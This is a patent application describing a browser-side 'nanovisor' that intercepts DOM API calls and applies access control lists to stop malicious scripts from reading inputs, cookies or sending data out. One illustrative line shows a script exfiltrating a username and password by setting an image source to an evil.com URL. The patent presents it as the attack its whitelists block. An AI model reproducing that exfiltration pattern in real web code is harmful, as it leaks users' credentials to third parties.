Malicious browser extensions and scripts can pose a serious threat to websites and web applications via the DOM APIs. Therefore, improved techniques for protecting websites and web application from malicious attacks would be desirable.
Various embodiments of the invention are disclosed in the following detailed description and the accompanying drawings.
The invention can be implemented in numerous ways, including as a process; an apparatus; a system; a composition of matter; a computer program product embodied on a computer readable storage medium; and/or a processor, such as a processor configured to execute instructions stored on and/or provided by a memory coupled to the processor. In this specification, these implementations, or any other form that the invention may take, may be referred to as techniques. In general, the order of the steps of disclosed processes may be altered within the scope of the invention. Unless stated otherwise, a component such as a processor or a memory described as being configured to perform a task may be implemented as a general component that is temporarily configured to perform the task at a given time or a specific component that is manufactured to perform the task. As used herein, the term ‘processor’ refers to one or more devices, circuits, and/or processing cores configured to process data, such as computer program instructions.
A detailed description of one or more embodiments of the invention is provided below along with accompanying figures that illustrate the principles of the invention. The invention is described in connection with such embodiments, but the invention is not limited to any embodiment. The scope of the invention is limited only by the claims and the invention encompasses numerous alternatives, modifications and equivalents. Numerous specific details are set forth in the following description in order to provide a thorough understanding of the invention. These details are provided for the purpose of example and the invention may be practiced according to the claims without some or all of these specific details. For the purpose of clarity, technical material that is known in the technical fields related to the invention has not been described in detail so that the invention is not unnecessarily obscured.
A webpage accessed by web browser 102 may be described by different markup languages, including Hypertext Markup Language (HTML), Extensible Markup Language (XML), and the like. The webpage may also be described by different scripting languages, including JavaScript Object Notation (JSON), and the like. The webpage may be described by other custom languages as well. HTML is used hereinafter as an example of the various languages for describing webpages. Note that the examples of HTML are selected for illustration purposes only; accordingly, the present application is not limited to these specific examples.
The Document Object Model (DOM) is a standardized model supported by different web browsers, e.g., Internet Explorer, Firefox, and Google Chrome, for representing the various components of a webpage. The DOM is a cross-platform and language-independent convention for representing and interacting with objects in HTML documents as well as XHTML and XML documents. Objects in a DOM tree may be addressed and manipulated using methods on the objects. The public interface of a DOM is specified in its application programming interfaces (APIs), known as the DOM APIs.
The DOM standard includes different levels. DOM core level 0 and level 1 are the core standards supported by all web browsers. DOM levels 2 and above are extensions to DOM core level 0 and level 1, which can be optionally supported by different web browsers. DOM core level 0 and level 1 define a minimal set of objects and interfaces for accessing and manipulating document objects. The DOM provides a complete model for an entire HTML document, including the means to change any portion of the document.
The DOM standard represents documents as a hierarchy of node objects, called a DOM tree. Within the document structure hierarchy, some types of nodes may have child nodes of various types, while others are leaf nodes that cannot have any object below them.
With continued reference to
After the webpage file is parsed and the corresponding DOM tree is created, the entire DOM tree can be traversed to retrieve any dependent resources (e.g., images, audio clips, or videos) indicated by any of the nodes in the DOM tree via a network. For example, the image object corresponding to the image tag in webpage 200 redirects web browser 102 to fetch an image file from an uniform resource locator (URL). Accordingly, web browser 102 sends a request via a network, requesting the image resource to be downloaded. There are two ways a request may be issued: statically, in which case it is the browser which manipulates the DOM; or dynamically, in which case the DOM manipulation is done by JavaScript. In response to the request, the requested dependent resource is sent to web browser 102 via a network.
A web application may include scripts that are executed when different DOM events occur. DOM event APIs allow event-driven programming languages (e.g., JavaScript, Jscript, ECMAScript, VBScript, and Java) to register various DOM event handlers/listeners with the element nodes inside a DOM tree. Different types of events can be generated by the element nodes inside a DOM tree, including mouse events, keyboard events, HTML frame/object events, HTML form events, user interface events, mutation events, progress events, and the like. For example, the DOM event API “onclick” is triggered when a user clicks on an element, and a script that has registered as a callback script for the “onclick” event will be executed. In another example, the DOM event API “onKeyDown” and “onKeyup” are triggered when a user presses a key and releases a key, respectively. In another example, the DOM event API “oninput” is triggered when an element receives user inputs.
Malicious browser extensions and scripts can pose a serious threat to websites and web applications via the DOM APIs.
Because the DOM APIs are processed by nanovisor 610 before they are passed to the DOM or executed, nanovisor 610 may accord different levels of privileges to different callers. For example, nanovisor 610 may restrict access and usage of a DOM API based on the type of the caller. Nanovisor 610 may restrict access and usage of a DOM API using a DOM API access control list, as will be described in greater detail below.
In some embodiments, the virtualization of the DOM of web browser 702 is transparent to web browser 702. In some embodiments, the virtualization of the DOM of web browser 702 is also transparent to the end-users. The end-users are not required to install any plug-ins. In some embodiments, the virtualization of the DOM of web browser 702 is also transparent to the content publishers, without requiring the content publishers to change any code. In some embodiments, client 706 may be injected into web browser 702 based on standards-based (e.g., HTML or JavaScript) procedures. For example, after edge server 708 receives a request from web browser 702 requesting an HTML webpage file, server 708 may parse the HTML webpage file, inject client 706 into the HTML webpage file, and then send the response back to web browser 702. In some embodiments, client 706 may be injected by adding JavaScript client code (e.g., <script src=“nanovisor.js”></script>) in the head section of the HTML webpage file.
Virtualization of the DOM of web browser 702 may be applicable to different types of optimization. In some embodiments, using the virtualization engine, DOM APIs may be supplanted by new DOM APIs for managing the privileges of different users and callers. In some embodiments, using the virtualization engine, optimized delivery of information over a network by segmentation and reprioritization of downloaded information can be achieved. For example, using the virtualization engine, the delivery of the information (e.g., the order in which the information is delivered or the granularity of the information delivered) and the actual content of the delivered information corresponding to any nodes of the DOM tree may be altered, thereby speeding up the rendering of a webpage, without compromising the end-user's experience.
Referring back to
After a DOM API is intercepted, the new DOM API may restrict access and usage of the DOM API based on the type or identity of the script. The new DOM API may restrict access and usage of a DOM API using a DOM API access control list.
f1->f2->f3 . . .fN->DOM API
where f1 is a function of script S1, f2 is a function of S2, f3 is a function of S3, and so on.
The determined list of scripts that causes the usage of the DOM API is the caller list A=[S1, S2, S3, . . . SN], and the scripts in the list are each determined as being associated with the usage of the DOM API.
At 1006, it is determined whether the usage of the DOM API by the one or more scripts is allowed based on a DOM API access control list. The DOM API access control list excludes usage of the DOM API by at least some types of scripts. A DOM API access control list (ACL) includes a list of permissions attached to the DOM API. The DOM API ACL specifies which scripts or types of scripts are granted access to the DOM API, as well as what usages of the DOM API (e.g., reading from and writing to the elements) are granted to each of the scripts. In some embodiments, the DOM API ACL specifies a whitelist of scripts B that are allowed to use a particular DOM API. Then the output of the DOM API access control list is a function of caller list A and the whitelist B:
Output=F(A, B)
For example, function F may allow the usage of the DOM API only if A is a strict subset of B (i.e., A⊂B). Other functions F may be used as well.
At 1008, the usage of the DOM API is processed based on the output of the DOM API access control list. For example, the nanovisor may block the usage of the DOM API. The nanovisor may modify the usage of the DOM API and pass a modified version of the intercepted DOM API to the DOM or the caller/user. The nanovisor may also trigger an alert but allow the usage of the DOM API. The alert may be sent to the edge proxy server 708. The nanovisor may also block the usage of the DOM API and trigger an alert.
Using DOM API access control lists, different types of usage of DOM APIs by different scripts can be managed by the nanovisor. A DOM API includes a base, an API of the base, and a set of arguments that is passed to the API of the base. For example, a DOM API can be represented as shown below:
base.API(arguments)
where the base is a DOM element or DOM object. Examples of DOM elements include <input>, <img>, <frame>, and <object>. Examples of DOM objects include document, window, and XMLHttpRequest(XHR). Usage of a DOM API includes any manipulations or access of the base, the APIs of the base, and the arguments. Different levels of privileges may be accorded to different callers. For example, a particular caller may be permitted to access and manipulate a particular base and all of the base's associated APIs and arguments. In another example, a particular caller may be permitted to access and manipulate only a portion of the APIs associated with a particular base. In yet another example, a particular caller may be permitted to access and manipulate only a portion of the arguments associated with a particular API of a base, and only certain values of the arguments are allowed.
DOM API access control lists may be created for different types of usage of DOM APIs. For example, DOM API access control lists may be created for restricting the usage of DOM APIs for node protection. DOM API access control lists may also be created for restricting the usage of DOM APIs that are related to visiting particular URLs or sending certain information to the URLs, creating cookies, and the like.
In one example of node protection, access to a value of an <input> element is restricted by the nanovisor using a DOM API access control list.
In one example of network protection, sensitive information (e.g., the username or password of a user) may be restricted from being sent to an external site through the network. One or more DOM API access control lists may be created to restrict certain usages of <img>. One of the DOM API access control lists restricts the creation of an <img> by scripts that are not in a whitelist; e.g., whitelist1. One of the DOM API access control lists restricts the setting of the source of the <img> by scripts that are not in another whitelist; e.g., whitelist2. One of the DOM API access control lists restricts certain values (for example, the username and password of the user) from being included in the argument used to set the source of the <img>. In this example, two scripts src1.js and src2.js are running on the web browser. Suppose that the DOM API whitelists include src1.js but not src2.js. src1.js may then create a new <img>, but src2.js does not have access to create a new <img>. JavasScript src2.js is further restricted from sending sensitive information (i.e., the username and password of the user) through the network by setting the source of the <img> as shown below:
var i=new img( )
i.src=“http://evil.com/?payload=username/password”
In one example of cookie protection, certain key values may be restricted from being returned as results to certain callers. A DOM API whitelist may be created to restrict the keys k1, k2, and k3 from being returned as results to callers that are not on the whitelist. In this example, two scripts src1js and src2.js are running on the web browser, and the DOM API whitelist includes src1.js but not src2.js. Suppose that document.cookie (document is the base object and cookie is the API) returns k1 and k10. If src1.js executes x=document. cookie, then the results returned to src1.js includes k1=v1 and k10=v10. In contrast, if src2.js executes x=document.cookie, then the results returned to src2.js includes only k10=v10 because k1=v1 is hidden from src2.js, which is not on the whitelist.
The scripts that are associated with the usage of a DOM API are authenticated using checksums.
In some embodiments, a DOM API access control list associated with the usage of a DOM API may be provided by the publisher of the web application or webpage. In some embodiments, the DOM API ACL may be learned by the client-server system 700 for virtualizing a DOM of a web browser. For example, edge server 708 may deliver HTML webpages belonging to a particular website or web application to many web browsers over a period of time, and edge server 708 may learn from the interactions with the different web browsers that a particular webpage is a login page because the webpage is always the first webpage that is retrieved by the web browsers. The edge server 708 may create a DOM API ACL that restricts the access of different user inputs on the login webpage to the web application and its scripts only.
Although the foregoing embodiments have been described in some detail for purposes of clarity of understanding, the invention is not limited to the details provided. There are many alternative ways of implementing the invention. The disclosed embodiments are illustrative and not restrictive.
This application claims priority to U.S. Provisional Patent Application No. 62/116,296 entitled CLIENT-SITE ELEMENT ACCESS CONTROL filed Feb. 13, 2015 which is incorporated herein by reference for all purposes.
Number | Date | Country | |
---|---|---|---|
62116296 | Feb 2015 | US |